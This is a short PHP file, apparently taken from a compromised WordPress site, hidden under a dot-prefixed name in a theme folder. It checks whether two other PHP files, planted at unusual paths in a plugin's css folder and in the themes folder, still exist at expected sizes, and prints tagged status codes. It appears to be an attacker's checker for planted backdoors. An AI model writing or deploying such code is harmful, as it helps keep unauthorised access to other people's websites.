File: /home/mirpogruzchikov.ru/public_html/wp-content/themes/.parameter_group
<?php $r = '/home/l/lordrp/mirpogruzchikov.ru/public_html'; $x = ["/wp-content/plugins/imgseo-ai-alt-text-generator/assets/css/7.php"=>"bd@@82501740@@820",
"/wp-content/themes/bild.php"=>"bd@@82506053@@820"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');